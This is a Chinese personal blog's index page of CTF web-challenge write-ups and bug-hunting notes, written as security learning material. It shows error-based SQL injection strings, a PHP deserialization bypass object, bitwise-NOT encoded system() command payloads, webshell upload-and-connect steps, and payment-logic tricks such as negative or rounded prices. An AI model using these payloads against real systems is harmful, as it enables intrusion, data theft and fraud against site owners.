LOADING

加载过慢请开启缓存 浏览器默认开启

youbing的博客

记录学习与生活

技术博客,分享编程学习笔记

ctfshow web应用安全与防护题解
2026/3/16

Base64编码隐藏

打开题目f12查看源码发现密码被base64加密

1773670223912

解码得到密码

1773670666647

登录得到flag

1773670740030

HTTP头注入

f12查看源码发现密码被base64加密

1773670223912

解码得到密码

1773670666647

登录提示只能ctf-show-brower登录

1773671083716

这里抓包修改(靶场默认开启https,删除s切换回http再抓包)

1773671245832

发送请求包得到flag

1773671327314

Base64多层嵌套解码

这里步骤跟“HTTP头注入”一样,只是中间的解码的步骤复杂了一些

第1步逆向:Base64解码 text atob(“SXpVRlF4TTFVelJtdFNSazB3VTJ4U1UwNXFSWGRVVlZrOWNWYzU=”)

第2步逆向:这一步是 btoa(‘aB3’ + encoded + ‘qW9’).substr(2) 对第1步结果Base64解码 得到完整字符串,前面补回2个字符 去掉开头的”aB3”和结尾的”qW9”

第3步逆向:这一步是 btoa(encoded.split(‘’).reverse().join(‘’)) 对第2步结果Base64解码 将字符串反转

第4步逆向:这一步是 btoa(encoded + ‘xH7jK’).slice(3) 对第3步结果Base64解码 开头补回3个字符 去掉结尾的”xH7jK”

第5步逆向:最后Base64解码,得到原始密码

题解
阅读全文

漏洞挖掘学习笔记
2026/3/10

int类型

2147483648=0

科学计数法

x为任意正整数
1e-x绕过检测让数为小数
1e+x绕过最大输入位数

四舍五入

例子:平台充值0.014第三方最小到0.01支付0.01实际到账0.014

Pirce

可以尝试将参数修改成不正常的值(如:-1,0.01,0.019)

越权

找到能够越权的参数比如userid、couponid、address

并发

漏洞挖掘
阅读全文

file
2026/3/3

这里让我们dirsearch一下

file_2eb28480

发现有一个上传文件的目录和查看上传文件的目录

file_c17016fa

这里先上传文件

只要抓包改后缀然后再到/uploaded/中查看文件位置用蚁剑连接就可以在根目录中找到flag

file_71a0079a

题解
阅读全文

phpurl
2026/3/3

用dirsearch扫描发现1.txt

phpurl_24d07bc5

访问发现是乱码,修复文字编码后得到

phpurl_7e3c95c5

这里base64解码得到index.phps访问发现需要让sys=xss这里需要二次编码

Payload:?sys=%25%37%38%25%37%38%25%37%33

输入得到flag

phpurl_75457d68

题解 PHP
阅读全文

search
2026/3/3

这道题输入一个单引号发现,sql语句报错,用union查询发现被禁用了这里用报错注入

先爆库名1’//And//Extractvalue(1,Concat(0x7e,User(),0x7e,Database()))#

search_f8e3e213

再爆表名

1’//And//Extractvalue(1,Concat(0x7e,(Select//Group_concat(Table_name)//From//Information_schema.tables//Where/**/Table_schema=’CTF’)))#

search_c92f661f

再爆字段名

search_3f7cfbc8

最后查看flag

1’//And//Extractvalue(1,Concat(0x7e,(Select//Group_concat(Flag)//From/**/CTF.Flag)))#

search_e7c964de

1’//And//Extractvalue(1,Concat(0x7e,(Select//SUBSTRING(Group_concat(Flag),21,40)//From/**/CTF.Flag)))#

search_ffe8467b

题解
阅读全文

ezphp
2026/3/2

这道题说爬虫那就查看一下/robots.txt

ezphp_0310c8c8

发现三个目录一个查看文件,一个上传文件,一个查看上传文件,这里传一个带一句话木马的图片,再查看位置,最后用蚁剑加查看文件执行木马

ezphp_7f6c0547

ezphp_5fc9f053

ezphp_6466707e

蚁剑连接成功查看文件得到flag

ezphp_58252f03

题解 PHP
阅读全文

你的马呢?
2026/3/2

这里把一句话木马base64编码

你的马呢_86260800

你的马呢_2338a065

上传.jpg文件,打开蚁剑用伪协议读取

你的马呢_05f81383

在根目录中找到flag.txt

你的马呢_a3400b15

题解 Webshell
阅读全文

随机值
2026/3/2

这道题需要绕过随机值,这里让两个属性指向同一个内存地址,从而绕过 === 比较

Payload:?sys=O:5:”Index”:4:{s:6:”Polar1”;N;s:6:”Polar2”;R:2;s:5:”Night”;N;s:5:”Light”;R:3;}

题解
阅读全文

data藏起来了
2026/3/1

查看发现文件头错误将它修改正确

data藏起来了_873ab5f2

解压得到word文件发现隐藏部分

data藏起来了_8e6385ef

结合题目给的日历对应日期连接得到GOODLUCK按照题目要求得到flag

flag{7dcb9bc0c7e6055b544c78c0e3e4d4a5}

题解
阅读全文

wu
2026/3/1

这道题可以用取反的方法执行命令

先用取反脚本得到system(‘ls’);

wu_13683b7b

发现当前目录下有一个zheshiflag.php

wu_8e63fc53

再将system(‘cat zheshiflag.php’);取反得到

(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%85%97%9A%8C%97%96%99%93%9E%98%D1%8F%97%8F);

输入得到flag

``

题解
阅读全文
1 ... 4 5 6 ... 16
avatar
youbing

你好!我是 youbing
这是我的技术博客
分享编程学习笔记和生活记录